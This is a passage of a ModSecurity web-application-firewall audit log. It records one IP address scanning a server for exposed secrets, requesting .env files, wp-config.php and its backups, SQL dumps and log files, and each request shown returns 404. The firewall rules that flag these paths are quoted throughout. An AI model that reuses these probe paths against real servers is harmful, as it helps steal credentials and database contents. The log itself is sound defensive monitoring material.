--7269ec62-B-- GET /core/dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7269ec62-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7269ec62-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/dump.sql"] [unique_id "aFCsB1JfblPUQiSn5r2RpQAAAAA"] Stopwatch: 1750117383609400 3281 (- - -) Stopwatch2: 1750117383609400 3281; combined=2062, p1=334, p2=1592, p3=49, p4=29, p5=58, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7269ec62-Z-- --e0843b20-A-- [17/Jun/2025:05:13:03.833880 +0530] aFCsB4oVQnPDyHnl9oPTuQAAAAY 185.177.72.204 36084 127.0.0.1 7080 --e0843b20-B-- GET /core/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e0843b20-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0843b20-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/error.log"] [unique_id "aFCsB4oVQnPDyHnl9oPTuQAAAAY"] Stopwatch: 1750117383830598 3326 (- - -) Stopwatch2: 1750117383830598 3326; combined=2069, p1=376, p2=1587, p3=22, p4=27, p5=57, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0843b20-Z-- --c6eb7170-A-- [17/Jun/2025:05:13:04.165072 +0530] aFCsCArsPejRtmHkrKLgkwAAAAE 185.177.72.204 36110 127.0.0.1 7080 --c6eb7170-B-- GET /core/logs/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c6eb7170-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6eb7170-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/logs/error.log"] [unique_id "aFCsCArsPejRtmHkrKLgkwAAAAE"] Stopwatch: 1750117384162086 3029 (- - -) Stopwatch2: 1750117384162086 3029; combined=1824, p1=364, p2=1365, p3=19, p4=24, p5=52, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c6eb7170-Z-- --6d2a1204-A-- [17/Jun/2025:05:13:04.716331 +0530] aFCsCIoVQnPDyHnl9oPTvAAAAAY 185.177.72.204 36140 127.0.0.1 7080 --6d2a1204-B-- GET /core/site.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6d2a1204-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d2a1204-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/site.conf"] [unique_id "aFCsCIoVQnPDyHnl9oPTvAAAAAY"] Stopwatch: 1750117384713454 2920 (- - -) Stopwatch2: 1750117384713454 2920; combined=1753, p1=324, p2=1335, p3=19, p4=24, p5=51, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6d2a1204-Z-- --e1778255-A-- [17/Jun/2025:05:13:04.827223 +0530] aFCsCJWbMc1Q3J_M-mhItAAAAAo 185.177.72.204 36152 127.0.0.1 7080 --e1778255-B-- GET /core/site.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e1778255-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1778255-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/site.sql"] [unique_id "aFCsCJWbMc1Q3J_M-mhItAAAAAo"] Stopwatch: 1750117384823542 3740 (- - -) Stopwatch2: 1750117384823542 3740; combined=2286, p1=408, p2=1744, p3=26, p4=32, p5=76, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1778255-Z-- --fdc39b39-A-- [17/Jun/2025:05:13:04.937596 +0530] aFCsCFCTF37l_jAzt4oTBAAAAAU 185.177.72.204 36164 127.0.0.1 7080 --fdc39b39-B-- GET /core/wp-config.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fdc39b39-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdc39b39-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/wp-config.php"] [unique_id "aFCsCFCTF37l_jAzt4oTBAAAAAU"] Stopwatch: 1750117384934451 3191 (- - -) Stopwatch2: 1750117384934451 3191; combined=1980, p1=415, p2=1471, p3=18, p4=25, p5=51, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fdc39b39-Z-- --59cb9068-A-- [17/Jun/2025:05:13:05.048652 +0530] aFCsCQrsPejRtmHkrKLglgAAAAE 185.177.72.204 36170 127.0.0.1 7080 --59cb9068-B-- GET /core/wp-config.php.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --59cb9068-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --59cb9068-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/wp-config.php.old"] [unique_id "aFCsCQrsPejRtmHkrKLglgAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/wp-config.php.old"] [unique_id "aFCsCQrsPejRtmHkrKLglgAAAAE"] Stopwatch: 1750117385045014 3703 (- - -) Stopwatch2: 1750117385045014 3703; combined=2399, p1=446, p2=1778, p3=25, p4=47, p5=103, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --59cb9068-Z-- --4928ff0a-A-- [17/Jun/2025:05:13:05.158884 +0530] aFCsCQGFf516NUzzD0B3XQAAAAg 185.177.72.204 36184 127.0.0.1 7080 --4928ff0a-B-- GET /crm/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4928ff0a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4928ff0a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/crm/.env"] [unique_id "aFCsCQGFf516NUzzD0B3XQAAAAg"] Stopwatch: 1750117385155868 3059 (- - -) Stopwatch2: 1750117385155868 3059; combined=1786, p1=370, p2=1318, p3=19, p4=24, p5=55, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4928ff0a-Z-- --3120292a-A-- [17/Jun/2025:05:13:05.269127 +0530] aFCsCZWbMc1Q3J_M-mhItQAAAAo 185.177.72.204 36192 127.0.0.1 7080 --3120292a-B-- GET /cron/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3120292a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3120292a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/cron/.env"] [unique_id "aFCsCZWbMc1Q3J_M-mhItQAAAAo"] Stopwatch: 1750117385265976 3208 (- - -) Stopwatch2: 1750117385265976 3208; combined=2105, p1=397, p2=1589, p3=21, p4=28, p5=70, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3120292a-Z-- --c45c2711-A-- [17/Jun/2025:05:13:05.600199 +0530] aFCsCQJ4p5Cdblnjra539AAAAAI 185.177.72.204 36210 127.0.0.1 7080 --c45c2711-B-- GET /data/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c45c2711-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c45c2711-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/data/.env"] [unique_id "aFCsCQJ4p5Cdblnjra539AAAAAI"] Stopwatch: 1750117385597004 3239 (- - -) Stopwatch2: 1750117385597004 3239; combined=1936, p1=375, p2=1459, p3=21, p4=26, p5=55, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c45c2711-Z-- --8460094c-A-- [17/Jun/2025:05:13:05.822397 +0530] aFCsCYoVQnPDyHnl9oPTvwAAAAY 185.177.72.204 36220 127.0.0.1 7080 --8460094c-B-- GET /database.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8460094c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8460094c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/database.bak"] [unique_id "aFCsCYoVQnPDyHnl9oPTvwAAAAY"] Stopwatch: 1750117385818361 4099 (- - -) Stopwatch2: 1750117385818361 4099; combined=2727, p1=419, p2=2170, p3=30, p4=37, p5=71, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8460094c-Z-- --897bf967-A-- [17/Jun/2025:05:13:06.043423 +0530] aFCsCpWbMc1Q3J_M-mhItwAAAAo 185.177.72.204 36248 127.0.0.1 7080 --897bf967-B-- GET /database.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --897bf967-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --897bf967-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/database.sql"] [unique_id "aFCsCpWbMc1Q3J_M-mhItwAAAAo"] Stopwatch: 1750117386039673 3810 (- - -) Stopwatch2: 1750117386039673 3810; combined=2374, p1=391, p2=1849, p3=27, p4=31, p5=75, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --897bf967-Z-- --79a49a10-A-- [17/Jun/2025:05:13:06.154018 +0530] aFCsCgrsPejRtmHkrKLgmQAAAAE 185.177.72.204 36262 127.0.0.1 7080 --79a49a10-B-- GET /db.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --79a49a10-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --79a49a10-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/db.bak"] [unique_id "aFCsCgrsPejRtmHkrKLgmQAAAAE"] Stopwatch: 1750117386150776 3285 (- - -) Stopwatch2: 1750117386150776 3285; combined=2004, p1=367, p2=1537, p3=21, p4=27, p5=52, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79a49a10-Z-- --5f669733-A-- [17/Jun/2025:05:13:06.484508 +0530] aFCsCuTJOk1gXj_qIh4X-AAAAAQ 185.177.72.204 36298 127.0.0.1 7080 --5f669733-B-- GET /db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5f669733-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f669733-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/db.sql"] [unique_id "aFCsCuTJOk1gXj_qIh4X-AAAAAQ"] Stopwatch: 1750117386481512 3040 (- - -) Stopwatch2: 1750117386481512 3040; combined=1897, p1=331, p2=1439, p3=21, p4=26, p5=80, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f669733-Z-- --05883c39-A-- [17/Jun/2025:05:13:06.596232 +0530] aFCsCooVQnPDyHnl9oPTwQAAAAY 185.177.72.204 36306 127.0.0.1 7080 --05883c39-B-- GET /db/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --05883c39-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --05883c39-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/db/.env"] [unique_id "aFCsCooVQnPDyHnl9oPTwQAAAAY"] Stopwatch: 1750117386591849 4449 (- - -) Stopwatch2: 1750117386591849 4449; combined=2739, p1=601, p2=1998, p3=30, p4=36, p5=74, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05883c39-Z-- --2af9072a-A-- [17/Jun/2025:05:13:06.816523 +0530] aFCsCpWbMc1Q3J_M-mhIuQAAAAo 185.177.72.204 36326 127.0.0.1 7080 --2af9072a-B-- GET /db_backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2af9072a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2af9072a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/db_backup.sql"] [unique_id "aFCsCpWbMc1Q3J_M-mhIuQAAAAo"] Stopwatch: 1750117386813838 2734 (- - -) Stopwatch2: 1750117386813838 2734; combined=1672, p1=310, p2=1227, p3=16, p4=22, p5=97, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2af9072a-Z-- --16d64d33-A-- [17/Jun/2025:05:13:07.037621 +0530] aFCsCwJ4p5Cdblnjra53-AAAAAI 185.177.72.204 36346 127.0.0.1 7080 --16d64d33-B-- GET /debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --16d64d33-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --16d64d33-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id 